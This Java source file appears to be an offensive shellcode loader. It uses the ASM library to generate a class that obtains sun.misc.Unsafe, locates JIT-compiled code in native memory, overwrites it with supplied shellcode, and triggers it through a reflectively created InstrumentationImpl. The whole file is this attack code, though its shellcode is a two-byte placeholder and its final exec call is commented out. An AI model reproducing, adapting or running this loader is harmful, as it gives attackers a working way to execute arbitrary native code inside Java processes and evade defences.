import jdk.internal.org.objectweb.asm.*;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

public class C2Loader1 {

    public void test() throws Throwable {
        byte[] shellcode = new byte[]{1,2};
        FileOutputStream stream = null;
        try{
            String suffix = ".class";
            shellcode = dump(shellcode);
            File file = File.createTempFile("demo", suffix);
            stream = new FileOutputStream(file);
            stream.write(shellcode);
//            Runtime.getRuntime().exec("java "+file.getAbsolutePath());
            System.out.println("java "+file.getAbsolutePath());
        }catch (Exception e){
            e.printStackTrace();
        }finally {
            if(stream != null){
                try {
                    stream.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    }

    public byte[] dump (byte[] shellcode) {
        ClassWriter cw = new ClassWriter(0);
        FieldVisitor fv;
        MethodVisitor mv;
        AnnotationVisitor av0;

        cw.visit(52, 1 + 32, "C2Loader", null, "java/lang/Object", null);
        {
            mv = cw.visitMethod(1, "<init>", "()V", null, null);
            mv.visitCode();
            mv.visitVarInsn(25, 0);
            mv.visitMethodInsn(183, "java/lang/Object", "<init>", "()V", false);
            mv.visitInsn(177);
            mv.visitMaxs(1, 1);
            mv.visitEnd();
        }
        {
            mv = cw.visitMethod(1, "test", "()V", null, new String[] { "java/lang/Throwable" });
            mv.visitCode();
            Label l0 = new Label();
            Label l1 = new Label();
            Label l2 = new Label();
            mv.visitTryCatchBlock(l0, l1, l2, "java/lang/Exception");
            Label l3 = new Label();
            Label l4 = new Label();
            Label l5 = new Label();
            mv.visitTryCatchBlock(l3, l4, l5, "java/lang/Exception");
            mv.visitIntInsn(17, shellcode.length);
            mv.visitIntInsn(188, 8);

            for(int i=0;i<shellcode.length;i++) {
                mv.visitInsn(89);
                mv.visitIntInsn(16, i);
                mv.visitIntInsn(16, shellcode[i]);
                mv.visitInsn(84);
            }

            mv.visitVarInsn(57, 1);
            mv.visitInsn(1);
            mv.visitVarInsn(57, 2);
            mv.visitLabel(l0);
            mv.visitLdcInsn(Type.getType("Lsun/misc/Unsafe;"));
            mv.visitLdcInsn("theUnsafe");
            mv.visitMethodInsn(182, "java/lang/Class", "getDeclaredField", "(Ljava/lang/String;)Ljava/lang/reflect/Field;", false);
            mv.visitVarInsn(57, 3);
            mv.visitVarInsn(25, 3);
            mv.visitInsn(4);
            mv.visitMethodInsn(182, "java/lang/reflect/Field", "setAccessible", "(Z)V", false);
            mv.visitVarInsn(25, 3);
            mv.visitInsn(1);
            mv.visitMethodInsn(182, "java/lang/reflect/Field", "get", "(Ljava/lang/Object;)Ljava/lang/Object;", false);
            mv.visitTypeInsn(192, "sun/misc/Unsafe");
            mv.visitVarInsn(57, 2);
            mv.visitLabel(l1);
            Label l6 = new Label();
            mv.visitJumpInsn(167, l6);
            mv.visitLabel(l2);
            mv.visitFrame(0, 3, new Object[] {"C2Loader", "[B", "sun/misc/Unsafe"}, 1, new Object[] {"java/lang/Exception"});
            mv.visitVarInsn(57, 3);
            mv.visitTypeInsn(187, "java/lang/AssertionError");
            mv.visitInsn(89);
            mv.visitVarInsn(25, 3);
            mv.visitMethodInsn(183, "java/lang/AssertionError", "<init>", "(Ljava/lang/Object;)V", false);
            mv.visitInsn(191);
            mv.visitLabel(l6);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(25, 1);
            mv.visitInsn(190);
            mv.visitIntInsn(17, 376);
            mv.visitInsn(96);
            mv.visitInsn(133);
            mv.visitVarInsn(55, 3);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 3);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "allocateMemory", "(J)J", false);
            mv.visitVarInsn(55, 5);
            mv.visitFieldInsn(178, "java/lang/System", "out", "Ljava/io/PrintStream;");
            mv.visitTypeInsn(187, "java/lang/StringBuilder");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "java/lang/StringBuilder", "<init>", "()V", false);
            mv.visitLdcInsn("allocateMemory:");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitVarInsn(22, 5);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false);
            mv.visitTypeInsn(187, "java/util/HashMap");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "java/util/HashMap", "<init>", "()V", false);
            mv.visitVarInsn(57, 7);
            mv.visitVarInsn(25, 7);
            mv.visitLdcInsn("X");
            mv.visitLdcInsn("y");
            mv.visitMethodInsn(185, "java/util/Map", "put", "(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;", true);
            mv.visitInsn(87);
            mv.visitTypeInsn(187, "C2Loader");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "C2Loader", "<init>", "()V", false);
            mv.visitVarInsn(57, 8);
            mv.visitInsn(3);
            mv.visitVarInsn(54, 9);
            Label l7 = new Label();
            mv.visitLabel(l7);
            mv.visitFrame(0, 8, new Object[] {"C2Loader", "[B", "sun/misc/Unsafe", new Integer(4), new Integer(4), "java/util/Map", "C2Loader", new Integer(1)}, 0, new Object[] {});
            mv.visitVarInsn(21, 9);
            mv.visitIntInsn(17, 10000);
            Label l8 = new Label();
            mv.visitJumpInsn(162, l8);
            mv.visitVarInsn(25, 8);
            mv.visitIntInsn(16, 33);
            mv.visitMethodInsn(183, "C2Loader", "b", "(I)V", false);
            mv.visitIincInsn(9, 1);
            mv.visitJumpInsn(167, l7);
            mv.visitLabel(l8);
            mv.visitFrame(2,1, null, 0, null);
            mv.visitLdcInsn(new Long(3000L));
            mv.visitMethodInsn(184, "java/lang/Thread", "sleep", "(J)V", false);
            mv.visitInsn(3);
            mv.visitVarInsn(54, 9);
            Label l9 = new Label();
            mv.visitLabel(l9);
            mv.visitFrame(1,1, new Object[] {new Integer(1)}, 0, null);
            mv.visitVarInsn(21, 9);
            mv.visitIntInsn(17, 10000);
            Label l10 = new Label();
            mv.visitJumpInsn(162, l10);
            mv.visitVarInsn(25, 2);
            mv.visitLdcInsn(new Long(16384L));
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "allocateMemory", "(J)J", false);
            mv.visitVarInsn(55, 10);
            mv.visitIincInsn(9, 1);
            mv.visitJumpInsn(167, l9);
            mv.visitLabel(l10);
            mv.visitFrame(2,1, null, 0, null);
            mv.visitInsn(9);
            mv.visitVarInsn(55, 9);
            mv.visitInsn(7);
            mv.visitVarInsn(54, 11);
            mv.visitIntInsn(17, -4096);
            mv.visitVarInsn(54, 12);
            Label l11 = new Label();
            mv.visitLabel(l11);
            mv.visitFrame(1,3, new Object[] {new Integer(4), new Integer(1), new Integer(1)}, 0, null);
            mv.visitVarInsn(21, 12);
            mv.visitIntInsn(17, 4096);
            Label l12 = new Label();
            mv.visitJumpInsn(162, l12);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 5);
            mv.visitVarInsn(21, 12);
            mv.visitVarInsn(21, 11);
            mv.visitInsn(104);
            mv.visitInsn(133);
            mv.visitInsn(97);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getAddress", "(J)J", false);
            mv.visitVarInsn(55, 13);
            mv.visitVarInsn(22, 13);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(113);
            mv.visitInsn(9);
            mv.visitInsn(148);
            Label l13 = new Label();
            mv.visitJumpInsn(158, l13);
            Label l14 = new Label();
            mv.visitJumpInsn(167, l14);
            mv.visitLabel(l13);
            mv.visitFrame(1,1, new Object[] {new Integer(4)}, 0, null);
            mv.visitVarInsn(22, 13);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(-4294967296L));
            mv.visitInsn(127);
            mv.visitInsn(148);
            mv.visitJumpInsn(158, l14);
            mv.visitVarInsn(22, 13);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(16777215L));
            mv.visitInsn(129);
            mv.visitInsn(148);
            mv.visitJumpInsn(156, l14);
            mv.visitVarInsn(22, 13);
            mv.visitLdcInsn(new Long(-16777216L));
            mv.visitInsn(127);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(-16777216L));
            mv.visitInsn(127);
            mv.visitInsn(148);
            Label l15 = new Label();
            mv.visitJumpInsn(154, l15);
            mv.visitJumpInsn(167, l14);
            mv.visitLabel(l15);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitLdcInsn("000000");
            mv.visitMethodInsn(182, "java/lang/String", "indexOf", "(Ljava/lang/String;)I", false);
            mv.visitJumpInsn(157, l14);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitLdcInsn("bebeb0");
            mv.visitMethodInsn(182, "java/lang/String", "endsWith", "(Ljava/lang/String;)Z", false);
            mv.visitJumpInsn(154, l14);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitLdcInsn("abebeb");
            mv.visitMethodInsn(182, "java/lang/String", "endsWith", "(Ljava/lang/String;)Z", false);
            Label l16 = new Label();
            mv.visitJumpInsn(153, l16);
            mv.visitJumpInsn(167, l14);
            mv.visitLabel(l16);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(16, 85);
            Label l17 = new Label();
            mv.visitJumpInsn(159, l17);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(17, 232);
            mv.visitJumpInsn(159, l17);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(16, -96);
            mv.visitJumpInsn(159, l17);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(16, 72);
            mv.visitJumpInsn(159, l17);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(16, 102);
            mv.visitJumpInsn(160, l14);
            mv.visitLabel(l17);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(22, 13);
            mv.visitVarInsn(55, 9);
            mv.visitJumpInsn(167, l12);
            mv.visitLabel(l14);
            mv.visitFrame(2,1, null, 0, null);
            mv.visitIincInsn(12, 1);
            mv.visitJumpInsn(167, l11);
            mv.visitLabel(l12);
            mv.visitFrame(2,1, null, 0, null);
            mv.visitVarInsn(22, 9);
            mv.visitInsn(9);
            mv.visitInsn(148);
            Label l18 = new Label();
            mv.visitJumpInsn(154, l18);
            mv.visitIntInsn(17, -256);
            mv.visitVarInsn(54, 12);
            Label l19 = new Label();
            mv.visitLabel(l19);
            mv.visitFrame(1,1, new Object[] {new Integer(1)}, 0, null);
            mv.visitVarInsn(21, 12);
            mv.visitIntInsn(17, 2048);
            mv.visitJumpInsn(162, l18);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 5);
            mv.visitVarInsn(21, 12);
            mv.visitVarInsn(21, 11);
            mv.visitInsn(104);
            mv.visitInsn(133);
            mv.visitInsn(97);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getAddress", "(J)J", false);
            mv.visitVarInsn(55, 13);
            mv.visitVarInsn(22, 13);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(113);
            mv.visitInsn(9);
            mv.visitInsn(148);
            Label l20 = new Label();
            mv.visitJumpInsn(158, l20);
            Label l21 = new Label();
            mv.visitJumpInsn(167, l21);
            mv.visitLabel(l20);
            mv.visitFrame(1,1, new Object[] {new Integer(4)}, 0, null);
            mv.visitVarInsn(22, 13);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(-4294967296L));
            mv.visitInsn(127);
            mv.visitInsn(148);
            mv.visitJumpInsn(158, l21);
            mv.visitVarInsn(22, 13);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(4294967295L));
            mv.visitInsn(129);
            mv.visitInsn(148);
            mv.visitJumpInsn(156, l21);
            mv.visitVarInsn(22, 13);
            mv.visitLdcInsn(new Long(-16777216L));
            mv.visitInsn(127);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(-16777216L));
            mv.visitInsn(127);
            mv.visitInsn(148);
            Label l22 = new Label();
            mv.visitJumpInsn(154, l22);
            mv.visitJumpInsn(167, l21);
            mv.visitLabel(l22);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitLdcInsn("0000000");
            mv.visitMethodInsn(182, "java/lang/String", "indexOf", "(Ljava/lang/String;)I", false);
            Label l23 = new Label();
            mv.visitJumpInsn(157, l23);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitLdcInsn("bebeb0");
            mv.visitMethodInsn(182, "java/lang/String", "endsWith", "(Ljava/lang/String;)Z", false);
            mv.visitJumpInsn(154, l23);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitLdcInsn("abebeb");
            mv.visitMethodInsn(182, "java/lang/String", "endsWith", "(Ljava/lang/String;)Z", false);
            Label l24 = new Label();
            mv.visitJumpInsn(153, l24);
            mv.visitLabel(l23);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitFieldInsn(178, "java/lang/System", "out", "Ljava/io/PrintStream;");
            mv.visitTypeInsn(187, "java/lang/StringBuilder");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "java/lang/StringBuilder", "<init>", "()V", false);
            mv.visitLdcInsn("maybe error address,skip ");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false);
            mv.visitJumpInsn(167, l21);
            mv.visitLabel(l24);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(16, 85);
            Label l25 = new Label();
            mv.visitJumpInsn(159, l25);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(17, 232);
            mv.visitJumpInsn(159, l25);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(16, -96);
            mv.visitJumpInsn(159, l25);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitIntInsn(16, 72);
            mv.visitJumpInsn(160, l21);
            mv.visitLabel(l25);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitFieldInsn(178, "java/lang/System", "out", "Ljava/io/PrintStream;");
            mv.visitTypeInsn(187, "java/lang/StringBuilder");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "java/lang/StringBuilder", "<init>", "()V", false);
            mv.visitLdcInsn("get bigger cache address:");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitLdcInsn(",at :");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitVarInsn(22, 5);
            mv.visitVarInsn(21, 12);
            mv.visitVarInsn(21, 11);
            mv.visitInsn(104);
            mv.visitInsn(133);
            mv.visitInsn(101);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitLdcInsn(",BYTE:");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 13);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "getByte", "(J)B", false);
            mv.visitInsn(133);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false);
            mv.visitVarInsn(22, 13);
            mv.visitVarInsn(55, 9);
            mv.visitJumpInsn(167, l18);
            mv.visitLabel(l21);
            mv.visitFrame(2,1, null, 0, null);
            mv.visitIincInsn(12, 1);
            mv.visitJumpInsn(167, l19);
            mv.visitLabel(l18);
            mv.visitFrame(2,1, null, 0, null);
            mv.visitFieldInsn(178, "java/lang/System", "out", "Ljava/io/PrintStream;");
            mv.visitTypeInsn(187, "java/lang/StringBuilder");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "java/lang/StringBuilder", "<init>", "()V", false);
            mv.visitLdcInsn("find address end,address is ");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitVarInsn(22, 9);
            mv.visitMethodInsn(184, "java/lang/Long", "toHexString", "(J)Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitLdcInsn(" mod 8 is:");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitVarInsn(22, 9);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(113);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(J)Ljava/lang/StringBuilder;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false);
            mv.visitMethodInsn(182, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false);
            mv.visitLdcInsn("");
            mv.visitVarInsn(57, 12);
            mv.visitVarInsn(22, 9);
            mv.visitVarInsn(55, 5);
            mv.visitTypeInsn(187, "java/lang/StringBuilder");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "java/lang/StringBuilder", "<init>", "()V", false);
            mv.visitVarInsn(22, 5);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(J)Ljava/lang/StringBuilder;", false);
            mv.visitLdcInsn("");
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false);
            mv.visitMethodInsn(182, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false);
            mv.visitVarInsn(57, 12);
            mv.visitLdcInsn("sun.instrument.InstrumentationImpl");
            mv.visitMethodInsn(184, "java/lang/Class", "forName", "(Ljava/lang/String;)Ljava/lang/Class;", false);
            mv.visitVarInsn(57, 13);
            mv.visitVarInsn(25, 13);
            mv.visitMethodInsn(182, "java/lang/Class", "getDeclaredConstructors", "()[Ljava/lang/reflect/Constructor;", false);
            mv.visitInsn(3);
            mv.visitInsn(50);
            mv.visitVarInsn(57, 14);
            mv.visitVarInsn(25, 14);
            mv.visitInsn(4);
            mv.visitMethodInsn(182, "java/lang/reflect/Constructor", "setAccessible", "(Z)V", false);
            mv.visitVarInsn(25, 14);
            mv.visitInsn(6);
            mv.visitTypeInsn(189, "java/lang/Object");
            mv.visitInsn(89);
            mv.visitInsn(3);
            mv.visitVarInsn(25, 12);
            mv.visitMethodInsn(184, "java/lang/Long", "parseLong", "(Ljava/lang/String;)J", false);
            mv.visitMethodInsn(184, "java/lang/Long", "valueOf", "(J)Ljava/lang/Long;", false);
            mv.visitInsn(83);
            mv.visitInsn(89);
            mv.visitInsn(4);
            mv.visitInsn(4);
            mv.visitMethodInsn(184, "java/lang/Boolean", "valueOf", "(Z)Ljava/lang/Boolean;", false);
            mv.visitInsn(83);
            mv.visitInsn(89);
            mv.visitInsn(5);
            mv.visitInsn(4);
            mv.visitMethodInsn(184, "java/lang/Boolean", "valueOf", "(Z)Ljava/lang/Boolean;", false);
            mv.visitInsn(83);
            mv.visitMethodInsn(182, "java/lang/reflect/Constructor", "newInstance", "([Ljava/lang/Object;)Ljava/lang/Object;", false);
            mv.visitVarInsn(57, 15);
            mv.visitVarInsn(25, 13);
            mv.visitLdcInsn("redefineClasses");
            mv.visitInsn(4);
            mv.visitTypeInsn(189, "java/lang/Class");
            mv.visitInsn(89);
            mv.visitInsn(3);
            mv.visitLdcInsn(Type.getType("[Ljava/lang/instrument/ClassDefinition;"));
            mv.visitInsn(83);
            mv.visitMethodInsn(182, "java/lang/Class", "getMethod", "(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;", false);
            mv.visitVarInsn(57, 16);
            mv.visitTypeInsn(187, "java/lang/instrument/ClassDefinition");
            mv.visitInsn(89);
            mv.visitLdcInsn(Type.getType("Ljava/lang/Class;"));
            mv.visitInsn(3);
            mv.visitIntInsn(188, 8);
            mv.visitMethodInsn(183, "java/lang/instrument/ClassDefinition", "<init>", "(Ljava/lang/Class;[B)V", false);
            mv.visitVarInsn(57, 17);
            mv.visitInsn(4);
            mv.visitTypeInsn(189, "java/lang/instrument/ClassDefinition");
            mv.visitInsn(89);
            mv.visitInsn(3);
            mv.visitVarInsn(25, 17);
            mv.visitInsn(83);
            mv.visitVarInsn(57, 18);
            mv.visitLabel(l3);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(97);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(16L));
            mv.visitInsn(97);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "putLong", "(JJ)V", false);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(97);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(97);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(16L));
            mv.visitInsn(97);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "putLong", "(JJ)V", false);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(16L));
            mv.visitInsn(97);
            mv.visitLdcInsn(new Long(360L));
            mv.visitInsn(97);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(16L));
            mv.visitInsn(97);
            mv.visitLdcInsn(new Long(360L));
            mv.visitInsn(97);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(97);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "putLong", "(JJ)V", false);
            mv.visitInsn(3);
            mv.visitVarInsn(54, 19);
            Label l26 = new Label();
            mv.visitLabel(l26);
            mv.visitFrame(0, 17, new Object[] {"C2Loader", "[B", "sun/misc/Unsafe", new Integer(4), new Integer(4), "java/util/Map", "C2Loader", new Integer(4), new Integer(1), "java/lang/String", "java/lang/Class", "java/lang/reflect/Constructor", "java/lang/Object", "java/lang/reflect/Method", "java/lang/instrument/ClassDefinition", "[Ljava/lang/instrument/ClassDefinition;", new Integer(1)}, 0, new Object[] {});
            mv.visitVarInsn(21, 19);
            mv.visitVarInsn(25, 1);
            mv.visitInsn(190);
            Label l27 = new Label();
            mv.visitJumpInsn(162, l27);
            mv.visitVarInsn(25, 2);
            mv.visitVarInsn(22, 5);
            mv.visitLdcInsn(new Long(16L));
            mv.visitInsn(97);
            mv.visitLdcInsn(new Long(360L));
            mv.visitInsn(97);
            mv.visitLdcInsn(new Long(8L));
            mv.visitInsn(97);
            mv.visitVarInsn(21, 19);
            mv.visitInsn(133);
            mv.visitInsn(97);
            mv.visitVarInsn(25, 1);
            mv.visitVarInsn(21, 19);
            mv.visitInsn(51);
            mv.visitMethodInsn(182, "sun/misc/Unsafe", "putByte", "(JB)V", false);
            mv.visitIincInsn(19, 1);
            mv.visitJumpInsn(167, l26);
            mv.visitLabel(l27);
            mv.visitFrame(2,1, null, 0, null);
            mv.visitVarInsn(25, 16);
            mv.visitVarInsn(25, 15);
            mv.visitInsn(4);
            mv.visitTypeInsn(189, "java/lang/Object");
            mv.visitInsn(89);
            mv.visitInsn(3);
            mv.visitVarInsn(25, 18);
            mv.visitInsn(83);
            mv.visitMethodInsn(182, "java/lang/reflect/Method", "invoke", "(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;", false);
            mv.visitInsn(87);
            mv.visitLabel(l4);
            Label l28 = new Label();
            mv.visitJumpInsn(167, l28);
            mv.visitLabel(l5);
            mv.visitFrame(4, 0, null, 1, new Object[] {"java/lang/Exception"});
            mv.visitVarInsn(57, 19);
            mv.visitVarInsn(25, 19);
            mv.visitMethodInsn(182, "java/lang/Exception", "printStackTrace", "()V", false);
            mv.visitLabel(l28);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitInsn(177);
            mv.visitMaxs(7, 20);
            mv.visitEnd();
        }
        {
            mv = cw.visitMethod(2, "a", "(I)I", null, null);
            mv.visitCode();
            mv.visitVarInsn(21, 1);
            mv.visitInsn(4);
            Label l0 = new Label();
            mv.visitJumpInsn(164, l0);
            mv.visitLabel(l0);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(21, 1);
            mv.visitInsn(4);
            mv.visitInsn(104);
            mv.visitInsn(172);
            mv.visitMaxs(2, 2);
            mv.visitEnd();
        }
        {
            mv = cw.visitMethod(2, "b", "(I)V", null, null);
            mv.visitCode();
            mv.visitVarInsn(25, 0);
            mv.visitVarInsn(21, 1);
            mv.visitMethodInsn(183, "C2Loader", "a", "(I)I", false);
            mv.visitInsn(4);
            Label l0 = new Label();
            mv.visitJumpInsn(164, l0);
            mv.visitVarInsn(25, 0);
            mv.visitVarInsn(21, 1);
            mv.visitMethodInsn(183, "C2Loader", "a", "(I)I", false);
            mv.visitInsn(87);
            Label l1 = new Label();
            mv.visitJumpInsn(167, l1);
            mv.visitLabel(l0);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitVarInsn(25, 0);
            mv.visitVarInsn(21, 1);
            mv.visitInsn(7);
            mv.visitInsn(96);
            mv.visitMethodInsn(183, "C2Loader", "a", "(I)I", false);
            mv.visitInsn(87);
            mv.visitLabel(l1);
            mv.visitFrame(3, 0, null, 0, null);
            mv.visitInsn(177);
            mv.visitMaxs(3, 2);
            mv.visitEnd();
        }
        {
            mv = cw.visitMethod(1 + 8, "main", "([Ljava/lang/String;)V", null, new String[] { "java/lang/Throwable" });
            mv.visitCode();
            mv.visitTypeInsn(187, "C2Loader");
            mv.visitInsn(89);
            mv.visitMethodInsn(183, "C2Loader", "<init>", "()V", false);
            mv.visitVarInsn(57, 1);
            mv.visitVarInsn(25, 1);
            mv.visitMethodInsn(182, "C2Loader", "test", "()V", false);
            mv.visitInsn(177);
            mv.visitMaxs(2, 2);
            mv.visitEnd();
        }
        cw.visitEnd();

        return cw.toByteArray();
    }


    public static void main(String[] args) throws Throwable {
        C2Loader1 t = new C2Loader1();
        t.test();
    }
}